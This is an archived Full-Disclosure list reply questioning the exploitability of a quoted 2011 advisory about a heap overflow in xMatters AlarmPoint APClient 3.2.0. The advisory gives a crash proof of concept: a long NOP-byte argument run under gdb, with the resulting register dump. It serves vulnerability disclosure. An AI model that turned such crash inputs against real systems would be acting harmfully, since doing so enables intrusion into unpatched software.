[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient
- From: Mario Vilas <mvilas@xxxxxxxxx>
- Date: Thu, 28 Apr 2011 14:40:22 -0300
Is the suid bit set on that binary? Otherwise, unless I'm missing something
it doesn't seem to be exploitable by an attacker...
On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco
<jsacco@xxxxxxxxxxxxxxxxxxxxxx>wrote:
> Information
> --------------------
> Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
> Version: APClient 3.2.0 (native)
> Software : xMatters AlarmPoint
> Vendor Homepage : http://www.xmatters.com
> Vulnerability Type : Heap Buffer Overflow
> Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
> Severity : High
> Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
> Description
> ------------------
> The AlarmPoint Java Server consists of a collection of software
> components and software APIs designed to provide a flexible and
> powerful set of tools for integrating various applications to
> AlarmPoint.
>
> Details
> -------------------
> AlarmPoint APClient is affected by a Heap Overflow vulnerability in
> version APClient 3.2.0 (native)
>
> A heap overflow condition is a buffer overflow, where the buffer that
> can be overwritten is allocated in the heap portion of memory, generally
> meaning that the buffer was allocated using a routine such as the POSIX
> malloc() call.
> https://www.owasp.org/index.php/Heap_overflow
>
>
> Exploit as follow:
> Submit a malicious file cointaining the exploit
> root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
> ./APClient.bin --submit-file maliciousfile.hex
> or
> (gdb) run `python -c 'print "\x90"*16287'`
> Starting program:
> /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
> 'print "\x90"*16287'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804be8a in free ()
> (gdb) i r
> eax 0xa303924 170932516
> ecx 0xbfb8 49080
> edx 0xa303924 170932516
> ebx 0x8059438 134583352
> esp 0xbfff3620 0xbfff3620
> ebp 0xbfff3638 0xbfff3638
> esi 0x8059440 134583360
> edi 0x80653f0 134632432
> eip 0x804be8a 0x804be8a <free+126>
> eflags 0x210206 [ PF IF RF ID ]
> cs 0x73 115
> ss 0x7b 123
> ds 0x7b 123
> es 0x7b 123
> fs 0x0 0
> gs 0x33 51
> (gdb)
>
>
> Solution
> -------------------
> No patch are available at this time.
>
> Credits
> -------------------
> Manual discovered by Insecurity Research Labs
> Juan Sacco - http://www.insecurityresearch.com
>
> --
> --
> _________________________________________________
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released stay tunned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/